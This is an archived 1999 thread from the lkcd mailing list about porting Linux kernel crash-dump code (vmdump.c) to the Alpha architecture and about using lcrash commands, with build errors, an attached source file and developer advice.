*/ >|>> >|>> Now, my understanding of the problem is that I need to go back two frames >|>> on >|>> the stack to get the PC of interest, and three for the RA of interest. How >|>> do >|>> I >|>> do this? I haven't had much luck yet trying to figure out how to navigate >|>> the >|>> kernel stack. I see the pt_regs structure, but I'm not exactly sure how to >|>> figure the frame size, since that can vary with each frame. >|>> >|>> On 13-Dec-1999 Matt Robinson wrote: >|>>> The problem is from panic(), you don't have the registers, so you >|>>> need to grab them. That way the 'lcrash' code has a point to start >|>>> with as far as the failing process is concerned. Hence the "if (regs)" >|>>> stuff. >|> >|>-- >|>Brian Hall >|>Linux Consultant -- Brian Hall Linux Consultant From owner-lkcd@oss.sgi.com Tue Dec 21 16:29:47 1999 Received: by oss.sgi.com id ; Tue, 21 Dec 1999 16:29:37 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:52841 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Tue, 21 Dec 1999 16:29:26 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id QAA06065 for ; Tue, 21 Dec 1999 16:30:51 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id QAA53899; Tue, 21 Dec 1999 16:27:39 -0800 (PST) Date: Tue, 21 Dec 1999 16:27:39 -0800 (PST) From: Matt Robinson To: Brian Hall cc: Matt Robinson , comp.os.linux.alpha@list.deja.com, lkcd@oss.sgi.com, axp-list@redhat.com Subject: Re: new problem: can't see vmdump.h? 
In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing On Thu, 23 Dec 1999, Brian Hall wrote: |>OK, I've got the following code in __dump_execute: |> |>__dump_execute(struct file *dump_file, char *panic_str, |> struct pt_regs *regs, int dump_level, int dump_compress_pages) |>{ |>dump_here: |> |>( some code skipped here) |> |> /* For Alpha, save the Program Counter and Stack Pointer */ |> dump_header.dh_esp = __asm__("$30"); /* get stack pointer */ |> dump_header.dh_eip = &&dump_here; /* get Program Counter */ |> |>Sound OK? That sounds just fine. :) |>I removed the cmd directory temporarily from the top level Makefile so I could |>do a test build (lots of work todo there!). Had to fix a type in sd.c, but the |>compile died completely when it reached arch/alpha/kernel/vmdump.c, apparently |>because it couldn't see vmdump.h. Huh? File does exist as requested in |>include/linux; adding an include line with the explicit path to it didn't help. Do you have: #ifndef CONFIG_VMDUMP #define CONFIG_VMDUMP #include #endif at the top of the file? This might be needed if you're compiling the new vmdump.o, but you don't have CONFIG_VMDUMP set. Just a thought. If that file gets built, it's because CONFIG_VMDUMP is in the object. Look at arch/i386/kernel/Makefile for an example: ifdef CONFIG_VMDUMP O_OBJS += vmdump.o endif |>Any idea why this fails to see the include? /usr/src/linux is actually |>symlinked to a mounted NFS share that holds the kernel source; doesn't seem |>like that would be the problem since the rest of the kernel was building fine. |>/usr/include/linux points to ../src/linux/include/linux/. Let me know what happens ... --Matt |>On 21-Dec-1999 Matt Robinson wrote: |>> On Thu, 23 Dec 1999, Brian Hall wrote: |>>|>Well, it's not clear to me how to get the PC and RA of interest off the |>>|>stack |>>|>when we are in the vmdump functions. 
We could retreive the RA from register |>>|>26 |>>|>in the panic() function itself, and pass that to the dump_execute function. |>>|>Then the dump code could at least tell where panic was called from. Is this |>>|>sufficient, or at least a start? |>> |>> In the __dump_execute() function, just save the PC into the right |>> registers, and that'll be enough. You don't have to fill the pt_regs |>> structure. |>> |>> The big keys are the stack pointer and the PC for that process within |>> the __dump_execute() function. Save the stack pointer into |>> dump_header.dh_esp, and the PC into dump_header.dh_eip. That's all |>> 'lcrash' should need in order to figure out the stack trace of the |>> failing process (for now). Having the RA is nice, but not entirely |>> necessary. |>> |>> I should have named dh_esp and dh_eip into something like dh_sp and |>> dh_pc, for simplicity's sake. Next revision ... |>> |>> --Matt |>> |>>|>On 18-Dec-1999 Brian Hall wrote: |>>|>> Okay, after some research, I think I figured out how to get at the needed |>>|>> Alpha registers: |>>|>> |>>|>> register unsigned long fptr __asm__("$15"); /* get frame pointer? */ |>>|>> register unsigned long sptr __asm__("$30"); /* get stack pointer? */ |>>|>> |>>|>> Now, my understanding of the problem is that I need to go back two frames |>>|>> on |>>|>> the stack to get the PC of interest, and three for the RA of interest. How |>>|>> do |>>|>> I |>>|>> do this? I haven't had much luck yet trying to figure out how to navigate |>>|>> the |>>|>> kernel stack. I see the pt_regs structure, but I'm not exactly sure how to |>>|>> figure the frame size, since that can vary with each frame. |>>|>> |>>|>> On 13-Dec-1999 Matt Robinson wrote: |>>|>>> The problem is from panic(), you don't have the registers, so you |>>|>>> need to grab them. That way the 'lcrash' code has a point to start |>>|>>> with as far as the failing process is concerned. Hence the "if (regs)" |>>|>>> stuff. 
|>>|> |>>|>-- |>>|>Brian Hall |>>|>Linux Consultant |> |> |>-- |>Brian Hall |>Linux Consultant |> From owner-lkcd@oss.sgi.com Wed Dec 22 09:33:16 1999 Received: by oss.sgi.com id ; Wed, 22 Dec 1999 09:33:07 -0800 Received: from zmamail01.zma.compaq.com ([161.114.64.101]:22543 "HELO zmamail01.zma.compaq.com") by oss.sgi.com with SMTP id ; Wed, 22 Dec 1999 09:32:52 -0800 Received: by zmamail01.zma.compaq.com (Postfix, from userid 12345) id 5B3CD5BB; Wed, 22 Dec 1999 12:32:23 -0500 (EST) Received: from cxo3ns.cxo.dec.com (cxo3ns.cxo.dec.com [16.63.0.10]) by zmamail01.zma.compaq.com (Postfix) with SMTP id 129764D6; Wed, 22 Dec 1999 12:32:22 -0500 (EST) Received: from brownfur.cxo.dec.com by cxo3ns.cxo.dec.com; (5.65v4.0/1.1.8.2/11Apr96-1001AM) id AA09505; Wed, 22 Dec 1999 10:32:21 -0700 Received: from dhcp192-89.cxo.dec.com by brownfur.cxo.dec.com (5.65v4.0/1.1.10.5/17Feb98-0753AM) id AA13388; Wed, 22 Dec 1999 10:32:20 -0700 Received: by compaq.com (sSMTP sendmail emulation); Fri, 24 Dec 1999 10:30:36 -0700 Content-Length: 13676 Message-Id: X-Mailer: XFMail 1.4.4 on Linux X-Priority: 3 (Normal) Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="_=XFMail.1.4.4.Linux:19991224103036:14377=_" In-Reply-To: Date: Fri, 24 Dec 1999 10:30:36 -0700 (MST) Reply-To: Brian Hall From: Brian Hall To: Matt Robinson Subject: Re: new problem: can't see vmdump.h? Cc: lkcd@oss.sgi.com Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing This message is in MIME format --_=XFMail.1.4.4.Linux:19991224103036:14377=_ Content-Type: text/plain; charset=us-ascii That fixed the vmdump.h problem. Now it actually compiles, with warnings (implied casts). I notice that dh_esp and dh_eip are 32 bits wide; they will need to be 64 bit for Alpha; and the other uint32_t(s) in vmdump.c (__dump_execute) will also need to be uint64_t(s), and the changes propagated, correct? 
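The width concern can be seen in a small, self-contained sketch. The two structs below are hypothetical stand-ins, not the real dump_header_t, and the sample address used in the demo is just an assumed, representative 64-bit value. Storing it in a 32-bit field silently drops the upper half, while a 64-bit field preserves it.

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical header fragments, for illustration only. */
struct hdr_narrow { uint32_t dh_esp; uint32_t dh_eip; };   /* 32-bit fields */
struct hdr_wide   { uint64_t dh_sp;  uint64_t dh_pc;  };   /* 64-bit fields */

/* Store an address in a 32-bit field and read it back. */
uint64_t roundtrip_narrow(uint64_t addr)
{
    struct hdr_narrow h = { 0, 0 };

    h.dh_eip = (uint32_t)addr;      /* upper 32 bits are discarded here */
    return h.dh_eip;
}

/* Store an address in a 64-bit field and read it back. */
uint64_t roundtrip_wide(uint64_t addr)
{
    struct hdr_wide h = { 0, 0 };

    h.dh_pc = addr;                 /* full value preserved */
    return h.dh_pc;
}

/* Example use: print what each layout keeps of a sample address. */
void show_truncation(void)
{
    uint64_t addr = 0xfffffc0000310000ULL;  /* sample value, an assumption */

    printf("narrow: %#llx\n", (unsigned long long)roundtrip_narrow(addr));
    printf("wide:   %#llx\n", (unsigned long long)roundtrip_wide(addr));
}
```

Any tool that reads the header has to agree on the same field widths, which is why the change would need to be propagated beyond vmdump.c.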
Now, should I go ahead and change dump_header_t to (choose one): 1) make dh_esp,etc uint64_t(s) in the header; 2) add fields specifically for alpha; 3) do #1 and change them to dh_sp and dh_pc while I'm at it? While it will compile, it fails to link because alpha/vmdump.o can't find dump_page_buf. Here are the errors: arch/alpha/kernel/kernel.o: In function `__dump_write_header': vmdump.c(.text+0xb658): undefined reference to `dump_page_buf' arch/alpha/kernel/kernel.o: In function `__dump_execute': vmdump.c(.text+0xb85c): undefined reference to `dump_page_buf' vmdump.c(.text+0xb934): undefined reference to `dump_page_buf' vmdump.c(.text+0xb968): undefined reference to `dump_page_buf' vmdump.c(.text+0xb97c): undefined reference to `dump_page_buf' arch/alpha/kernel/kernel.o(.text+0xb9bc):vmdump.c: more undefined references to `dump_page_buf' follow Attached is my current version of arch/alpha/kernel/vmdump.c. -- Brian Hall Linux Consultant --_=XFMail.1.4.4.Linux:19991224103036:14377=_ Content-Disposition: attachment; filename="vmdump.c" Content-Transfer-Encoding: quoted-printable Content-Description: vmdump.c Content-Type: application/octet-stream; name=vmdump.c; SizeOnDisk=11708 /* * Architecture specific (Alpha) functions for Linux crash dumps. * * Created by: Matt Robinson (yakker@sgi.com) * * Ported to Alpha by: Brian Hall (brihall@bigfoot.com) * * Copyright 1999 Silicon Graphics, Inc. All rights reserved. *=20 */ /* * The hooks for dumping the kernel virtual memory to disk are in this * file. Any time a modification is made to the virtual memory mechanism, * these routines must be changed to use the new mechanisms. 
*/ #include #include #ifndef CONFIG_VMDUMP #define CONFIG_VMDUMP #include #endif #include #include /* static variables */ static dump_header_t dump_header; static char dpcpage[PAGE_SIZE]; /* external variables */ extern struct new_utsname system_utsname; extern void *dump_page_buf; /* * Name: __dump_write() * Func: Write out memory to the appropriate dump device, specific to * each architecture. */ static int __dump_write(struct file *dump_file, char *memory_page, int memory_len) { return (dump_file->f_op->write(dump_file, memory_page, memory_len, &(dump_file->f_pos))); } /* * Name: __dump_page_valid() * Func: Make sure the page address passed in is valid in the physical * address space. Right now, we validate all pages. */ static int __dump_page_valid(int mem_offset) { return (1); } /* * Name: __dump_compress() * Func: Compress a PAGE_SIZE page down to something more reasonable, * if possible. This is the same routine we use in IRIX. * * XXX - this needs to be changed for greater than 32-bit systems. */ static uint32_t __dump_compress(char *old_addr, char *new, int size) { int ri, wi, count =3D 0; u_char value =3D 0, cur_byte; /* * If the block should happen to "compress" to larger than the * buffer size, allocate a larger one and change cur_buf_size. 
*/ wi =3D ri =3D 0; while (ri < size) { if (!ri) { cur_byte =3D value =3D old_addr[ri]; count =3D 0; } else { if (count =3D=3D 255) { if (wi + 3 > size) { return size; } new[wi++] =3D 0; new[wi++] =3D count; new[wi++] =3D value; value =3D cur_byte =3D old_addr[ri]; count =3D 0; } else {=20 if ((cur_byte =3D old_addr[ri]) =3D=3D value) { count++; } else { if (count > 1) { if (wi + 3 > size) { return size; } new[wi++] =3D 0; new[wi++] =3D count; new[wi++] =3D value; } else if (count =3D=3D 1) { if (value =3D=3D 0) { if (wi + 3 > size) { return size; } new[wi++] =3D 0; new[wi++] =3D 1; new[wi++] =3D 0; } else { if (wi + 2 > size) { return size; } new[wi++] =3D value; new[wi++] =3D value; } } else { /* count =3D=3D 0 */ if (value =3D=3D 0) { if (wi + 2 > size) { return size; } new[wi++] =3D value; new[wi++] =3D value; } else { if (wi + 1 > size) { return size; } new[wi++] =3D value; } } /* if count > 1 */ value =3D cur_byte; count =3D 0; } /* if byte =3D=3D value */ } /* if count =3D=3D 255 */ } /* if ri =3D=3D 0 */ ri++; } if (count > 1) { if (wi + 3 > size) { return size; } new[wi++] =3D 0; new[wi++] =3D count; new[wi++] =3D value; } else if (count =3D=3D 1) { if (value =3D=3D 0) { if (wi + 3 > size) return size; new[wi++] =3D 0; new[wi++] =3D 1; new[wi++] =3D 0; } else { if (wi + 2 > size) return size; new[wi++] =3D value; new[wi++] =3D value; } } else { /* count =3D=3D 0 */ if (value =3D=3D 0) { if (wi + 2 > size) return size; new[wi++] =3D value; new[wi++] =3D value; } else { if (wi + 1 > size) return size; new[wi++] =3D value; } } /* if count > 1 */ value =3D cur_byte; count =3D 0; return wi; } /* * Name: __dump_write_header() * Func: Write out the dump header to the dump device. This is done * in almost every case, unless the dump_level is 0. 
 */
static int
__dump_write_header(struct file *dump_file)
{
	/* write dump header initial values */
	dump_header.dh_magic_number = DUMP_MAGIC_NUMBER;
	dump_header.dh_version = DUMP_VERSION_NUMBER;
	dump_header.dh_header_size = sizeof(dump_header_t);
	dump_header.dh_page_size = PAGE_SIZE;
	do_gettimeofday(&dump_header.dh_time);
	memcpy((void *)&(dump_header.dh_utsname),
		(const void *)&system_utsname, sizeof(struct new_utsname));

	/* make sure the dump header isn't TOO big */
	if (sizeof(dump_header_t) > PAGE_SIZE) {
		printk(KERN_WARNING "__dump_write_header(): header larger "
			"than PAGE_SIZE!\n");
		return (-1);
	}

	/* clear the dump page buffer */
	memset(dump_page_buf, 0, DUMP_PAGE_SZ);

	/* copy the dump header directly into the dump page buffer */
	memcpy((void *)dump_page_buf, (const void *)&dump_header,
		sizeof(dump_header_t));

	/* write the header out to disk */
	dump_file->f_pos = PAGE_SIZE;
	if (__dump_write(dump_file, (char *)dump_page_buf,
		DUMP_PAGE_SZ) < 0) {
		return (-1);
	}
	return (0);
}

/*
 * Name: __dump_close()
 * Func: Close a dump device (properly if possible).
 */
static void
__dump_close(struct file *dump_file)
{
	return;
}

/*
 * Name: __dump_execute()
 * Func: Architecture specific dumping routine.  This allows various
 *       system types to come up with their own crash dump implementation
 *       without changing the basic process.
 */
void
__dump_execute(struct file *dump_file, char *panic_str, struct pt_regs *regs,
	int dump_level, int dump_compress_pages)
{
	register unsigned long sptr __asm__("$30");
	dump_page_t dp;
	uint32_t mem_loc, buf_loc;
	uint32_t cloop, size, psize;

dump_here:
	psize = sizeof(dump_page_t);
	buf_loc = cloop = 0;

	/* if they don't want to dump out memory, bail out */
	if ((dump_level == DUMP_NONE) || (!dump_file)) {
		return;
	}

	/* set up a couple of the one-time dump header values */
	dump_header.dh_dump_level = dump_level;
	dump_header.dh_current_task = current;
	if (regs) {
		memcpy((void *)&(dump_header.dh_regs),
			(const void *)regs, sizeof(struct pt_regs));
	}
	if (panic_str) {
		memcpy((void *)&(dump_header.dh_panic_string),
			(const void *)panic_str, DUMP_PANIC_LEN);
	}

	/* For Alpha, save the Program Counter and Stack Pointer */
	dump_header.dh_esp = sptr;
	dump_header.dh_eip = &&dump_here; /* get Program Counter */

	/* dump out the header */
	printk("Writing dump header ...");
	if (__dump_write_header(dump_file) < 0) {
		printk(" __dump_write_header() failed!\n");
		return;
	}

	/* if we only want the header, return */
	if (dump_level == DUMP_HEADER) {
		printk("\nDump complete.\n");
		return;
	}
	printk("\nWriting dump pages ...");

	/* get the first memory page from the start of memory, aligned */
	mem_loc = dump_header.dh_memory_start;

	/* clear the dump page buffer */
	memset(dump_page_buf, 0, DUMP_PAGE_SZ);

	/*
	 * Start walking through each page of memory, dumping it out
	 * as you go.  The real key here is that we have to cram all
	 * of our write operations into a page/sector aligned size,
	 * because we are using raw I/O code to perform the writes to
	 * disk.  This means we need to fit as much as possible into
	 * a 64K write().  So we write dump page header, then the page
	 * itself (which may be compressed), etc., etc., etc., until
	 * we can't fit another compressed page into the write buffer.
	 * We then write the entire page out to the dump device.
	 */
	while (mem_loc < dump_header.dh_memory_end) {

		/* make sure the address is valid in the physical space */
		if (!__dump_page_valid(mem_loc)) {
			continue;
		}

		/*
		 * Create the dump header -- XXX for greater than
		 * 32-bit memory spaces, this must be corrected so
		 * the high address is used properly.
		 */
		dp.dp_address = mem_loc;
		dp.dp_flags = DUMP_RAW;
		dp.dp_size = PAGE_SIZE;

		/* see if we want to compress the pages or not */
		if (dump_compress_pages) {
			dp.dp_flags = DUMP_COMPRESSED;
			memset(dpcpage, 0, PAGE_SIZE);

			/* get the new compressed page size */
			size = __dump_compress((char *)mem_loc,
				(char *)dpcpage, PAGE_SIZE);

			/* if compressed page is same size, skip it */
			if (size == PAGE_SIZE) {
				dp.dp_flags = DUMP_RAW;
				dp.dp_size = PAGE_SIZE;
			} else {
				dp.dp_size = size;
			}
		}

		/* copy the page header */
		memcpy((void *)(dump_page_buf + buf_loc),
			(const void *)&dp, psize);
		buf_loc += psize;

		/* copy the page of memory */
		if (dp.dp_flags & DUMP_COMPRESSED) {
			/* copy the compressed page */
			memcpy((void *)(dump_page_buf + buf_loc),
				(const void *)dpcpage, dp.dp_size);
		} else {
			/* copy directly from memory */
			memcpy((void *)(dump_page_buf + buf_loc),
				(const void *)mem_loc, dp.dp_size);
		}
		buf_loc += dp.dp_size;

		/* see if we need to write out the buffer */
		if (buf_loc >= DUMP_PAGE_SZ) {
			if (__dump_write(dump_file, dump_page_buf,
				DUMP_PAGE_SZ) < 0) {
				printk(" dump write error!\n");
				return;
			}
			if (buf_loc > DUMP_PAGE_SZ) {
				/* clear the dump page buffer */
				memset(dump_page_buf, 0, DUMP_PAGE_SZ);

				/* copy the dump page buffer remnants */
				memcpy((void *)dump_page_buf,
					(const void *)(dump_page_buf +
					DUMP_PAGE_SZ),
					buf_loc - DUMP_PAGE_SZ);

				/* set the new buffer location */
				buf_loc -= DUMP_PAGE_SZ;
			} else {
				buf_loc = 0;
			}

			/* see if we want to print out a '.'
			 */
			cloop++;
			if (!(cloop & 0xff)) {
				printk(".");
			}
		}

		/* update the page count */
		dump_header.dh_num_pages++;

		/* increment to the next page */
		mem_loc += PAGE_SIZE;
	}

	/* set up the dump page header with DUMP_END */
	dp.dp_address = 0x0;
	dp.dp_flags = DUMP_END;
	dp.dp_size = 0x0;

	/* copy the current buffer */
	memcpy((void *)(dump_page_buf + buf_loc), (const void *)&dp, psize);

	/* increment the buffer size */
	buf_loc += psize;

	/* write out now that we have the DUMP_END header in there */
	if (__dump_write(dump_file, dump_page_buf, DUMP_PAGE_SZ) < 0) {
		printk(" dump write error!\n");
		return;
	}

	/* we have something left in the buffer to write out ... */
	if (buf_loc > DUMP_PAGE_SZ) {
		/* clear the dump page buffer */
		memset(dump_page_buf, 0, DUMP_PAGE_SZ);

		/* copy the dump page buffer remnants */
		memcpy((void *)dump_page_buf,
			(const void *)(dump_page_buf + DUMP_PAGE_SZ),
			buf_loc - DUMP_PAGE_SZ);

		/* set the new buffer location */
		buf_loc -= DUMP_PAGE_SZ;

		/* write out that _last_ bit of buffer! */
		if (__dump_write(dump_file, dump_page_buf,
			DUMP_PAGE_SZ) < 0) {
			printk(" dump write error!\n");
			return;
		}
	}

	/* terminate the dots ... */
	printk("\n");

	/* dump out the dump header again - reset the file position! */
	if (__dump_write_header(dump_file) < 0) {
		printk("Final dump header update failed!\n");
		return;
	}
	printk("Dump complete.\n");

	/* close the dump device */
	__dump_close(dump_file);
	return;
}

/*
 * Name: __dump_init()
 * Func: Initialize the dumping routine process.  For now, this just
 *       copies the locations of the beginning and end of memory.
 * TODO: Add code to handle memory gaps appropriately.
 */
void
__dump_init(uint64_t local_memory_start, uint64_t local_memory_end)
{
	/* initialize the dump header to zero */
	memset(&dump_header, 0, sizeof(dump_header));

	/* copy the locations of the start and end of memory */
	dump_header.dh_memory_start = local_memory_start;
	dump_header.dh_memory_end = local_memory_end;
	return;
}

/*
 * Name: __dump_open()
 * Func: Open the dump device (architecture specific).  This is in
 *       case it's necessary in the future.
 */
void
__dump_open(struct file *dump_file, uint64_t memory_size)
{
	/* set the memory size now */
	dump_header.dh_memory_size = memory_size;

	/* return */
	return;
}

--_=XFMail.1.4.4.Linux:19991224103036:14377=_--
End of MIME message

From owner-lkcd@oss.sgi.com Wed Dec 22 15:38:58 1999 Received: by oss.sgi.com id ; Wed, 22 Dec 1999 15:38:48 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:10816 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Wed, 22 Dec 1999 15:38:20 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id PAA04007 for ; Wed, 22 Dec 1999 15:39:51 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id PAA59851; Wed, 22 Dec 1999 15:36:37 -0800 (PST) Date: Wed, 22 Dec 1999 15:36:37 -0800 (PST) From: Matt Robinson Reply-To: Matt Robinson To: Brian Hall cc: Matt Robinson , lkcd@oss.sgi.com Subject: Re: new problem: can't see vmdump.h? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing

On Fri, 24 Dec 1999, Brian Hall wrote:
|>That fixed the vmdump.h problem. Now it actually compiles, with warnings
|>(implied casts).
I notice that dh_esp and dh_eip are 32 bits wide; they will
|>need to be 64 bit for Alpha; and the other uint32_t(s) in vmdump.c
|>(__dump_execute) will also need to be uint64_t(s), and the changes
|>propagated, correct?
|>
|>Now, should I go ahead and change dump_header_t to (choose one):
|>1) make dh_esp,etc uint64_t(s) in the header;

I'd make them whatever the dh_esp and dh_eip equivalents are in the
pt_regs structure for SP and PC.

|>2) add fields specifically for alpha;
|>3) do #1 and change them to dh_sp and dh_pc while I'm at it?

Do the name change while you're at it. I'll change things in our patch.

|>While it will compile, it fails to link because alpha/vmdump.o can't find
|>dump_page_buf. Here are the errors:
|>
|>arch/alpha/kernel/kernel.o: In function `__dump_write_header':
|>vmdump.c(.text+0xb658): undefined reference to `dump_page_buf'
|>arch/alpha/kernel/kernel.o: In function `__dump_execute':
|>vmdump.c(.text+0xb85c): undefined reference to `dump_page_buf'
|>vmdump.c(.text+0xb934): undefined reference to `dump_page_buf'
|>vmdump.c(.text+0xb968): undefined reference to `dump_page_buf'
|>vmdump.c(.text+0xb97c): undefined reference to `dump_page_buf'
|>arch/alpha/kernel/kernel.o(.text+0xb9bc):vmdump.c: more undefined references to
|>`dump_page_buf' follow
|>
|>Attached is my current version of arch/alpha/kernel/vmdump.c.

Hmmm ... That'd be because for whatever reason, it's not showing up
in your kernel/vmdump.c file. It's defined there for the main build.
Are you sure you're compiling with CONFIG_VMDUMP defined everywhere?

Change the header for vmdump.c in the kernel directory, to the same
thing for the file. That should eliminate your problem.

The real question is, why aren't you getting your CONFIG_VMDUMP stuff
defined when you build?
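
On the field-width question earlier in this message, here is a minimal sketch of what goes wrong if a 64-bit program counter is stored in a 32-bit header field. The struct names hdr32 and hdr64, the helper names, and the sample address are all hypothetical and only for illustration; this is not the real dump_header_t layout. The dh_sp and dh_pc names follow the rename agreed above.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical stand-ins for the two layouts; NOT the real dump_header_t. */
struct hdr32 { uint32_t dh_esp; uint32_t dh_eip; };  /* 32-bit fields, as today */
struct hdr64 { uint64_t dh_sp;  uint64_t dh_pc;  };  /* widened, renamed fields */

/* Store a 64-bit PC in the 32-bit field and read it back. */
static uint64_t roundtrip32(uint64_t pc)
{
	struct hdr32 h = { 0, 0 };

	h.dh_eip = (uint32_t)pc;	/* upper 32 bits are dropped here */
	return h.dh_eip;
}

/* Store a 64-bit PC in the 64-bit field and read it back. */
static uint64_t roundtrip64(uint64_t pc)
{
	struct hdr64 h = { 0, 0 };

	h.dh_pc = pc;
	return h.dh_pc;
}

/* Quick self-check; call it from main() when experimenting. */
static void check_field_widths(void)
{
	const uint64_t pc = 0xfffffc0000310000ULL;	/* assumed sample address */

	assert(roundtrip32(pc) != pc);	/* truncated: only the low 32 bits survive */
	assert(roundtrip64(pc) == pc);	/* preserved */
}
```

The same truncation would apply to mem_loc and dp_address in __dump_execute as long as they stay uint32_t, which is why the widening has to be propagated rather than done in the header alone.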

--Matt

|>--
|>Brian Hall
|>Linux Consultant
|>

From owner-lkcd@oss.sgi.com Wed Dec 22 15:44:58 1999 Received: by oss.sgi.com id ; Wed, 22 Dec 1999 15:44:48 -0800 Received: from deliverator.sgi.com ([204.94.214.10]:48651 "EHLO deliverator.sgi.com") by oss.sgi.com with ESMTP id ; Wed, 22 Dec 1999 15:44:37 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by deliverator.sgi.com (980309.SGI.8.8.8-aspam-6.2/980310.SGI-aspam) via ESMTP id PAA20820 for ; Wed, 22 Dec 1999 15:39:56 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id PAA64010; Wed, 22 Dec 1999 15:42:55 -0800 (PST) Date: Wed, 22 Dec 1999 15:42:55 -0800 (PST) From: Matt Robinson To: Matt Robinson cc: Brian Hall , lkcd@oss.sgi.com Subject: Re: new problem: can't see vmdump.h? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing

On Wed, 22 Dec 1999, Matt Robinson wrote:
|>Change the header for vmdump.c in the kernel directory, to the same
|>thing for the file. That should eliminate your
|>problem.

To clarify, it would be:

	#ifndef CONFIG_VMDUMP
	#define CONFIG_VMDUMP
	#include
	#endif

And change kernel/Makefile so that vmdump.o isn't on the O_OBJS
build line (at the top of the file), and instead you have:

	ifeq ($(CONFIG_VMDUMP),y)
	O_OBJS += vmdump.o
	endif

Thanks, Brian, let me know how it goes.

--Matt

P.S.
When you get to cmd/lcrash, remember to build with the following
arguments:

	make TOPDIR= ARCH=

So, in my case, it'd be:

	make TOPDIR=/usr/src/linux ARCH=i386

From owner-lkcd@oss.sgi.com Thu Dec 23 00:45:59 1999 Received: by oss.sgi.com id ; Thu, 23 Dec 1999 00:45:50 -0800 Received: from fes-qout.whowhere.com ([209.1.236.7]:6323 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Thu, 23 Dec 1999 00:45:32 -0800 Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Thu Dec 23 00:44:35 1999 To: "Tom Morano" Date: Thu, 23 Dec 1999 00:44:35 -0800 From: "Ashish Arora" Message-ID: Mime-Version: 1.0 Cc: "Matt Robinson" , lkcd@oss.sgi.com X-Sent-Mail: on Reply-To: ashisharora@mailcity.com X-Mailer: MailCity Service Subject: Problem in using lcrash commands X-Sender-Ip: 203.141.89.173 Organization: MailCity (http://www.mailcity.lycos.com:80) Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 3687 Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing

Hi Matt and Tom,

I tried the commands in lcrash again but with the same problem: it tells me that the usage of the command is not proper. For example, the ptype command asks for the --- type addr. I don't know where to get these parameters to supply to the commands, or what those parameters mean. Also, in some places it asks for addresses, such as a stack address; where do I get those addresses from? I am not able to find namelists. What is meant by namelists, and how are they specified? Can you tell me where I can get comprehensive documentation for the commands used here, so that I can learn their proper usage?

In my previous mail I stated by mistake that I get a segmentation fault with "whatis -s"; I get that problem with "whatis -a". I am not able to find these answers in the FAQs.
I have also gone through the source code for the commands and am not able to solve these problems.

--Ashish

--

On Tue, 21 Dec 1999 09:00:15 Tom Morano wrote:
>Ashish Arora wrote:
>>
>> Dear Matt,
>> i am using the commands with the lcrash. In this i am unable to find the proper usage for the commands. Whenever i type a command in lcrash, it gives a message saying that the usage for the command is wrong. Can u tell me where can i get to know about the proper usage for all those commands. I have already gone through the help provided for each command but i am still unable to overcome that problem.
>
>It's hard to tell what's going on without an example of what you are trying.
>Could you
>please provide such an example?
>
>> Also when i used the whatis command with -s option it gave a segmentation fault error and quitted from lcrash.
>
>Hi Ashish,
>
>I'm not sure what's going on here. The -s flag is not valid for the 'whatis'
>command. When
>I tried it, here's what I got...
>
>>> whatis -s
>Illegal comamnd line option: 's'
>USAGE: whatis [-a] [-f] [-l] [-n] [-w outfile] expression
>
>BTW, the whatis command doesn't do anything unless you first load in type
>information from
>a namelist file (one is created in the cmd/lcrash/lib/libklib directory). You
>have to
>issue a command such as this:
>
>>> addtypes namelist
>
>Then you can do something like this...
>
>>> whatis socket
>struct socket {
>    socket_state state;
>    long unsigned int flags;
>    struct proto_ops *ops;
>    struct inode *inode;
>    struct fasync_struct *fasync_list;
>    struct file *file;
>    struct sock *sk;
>    struct wait_queue *wait;
>    short int type;
>    unsigned char passcred;
>    unsigned char tli;
>};
>
>Hope this helps,
>
>Tom
>
>> --Ashish
>>
>> --
>>
>> On Tue, 14 Dec 1999 23:17:45 Matt Robinson wrote:
>> >Ashish, have you read the FAQ?
>> >
>> > http://oss.sgi.com/projects/lkcd/faq.html#2.3
>> >
>> >This should have answered your question.
>> >
>> >--Matt
>> >
>> >On Wed, 15 Dec 1999, Keith Owens wrote:
>> >|>On Tue, 14 Dec 1999 22:27:17 -0800,
>> >|>"Ashish Arora" wrote:
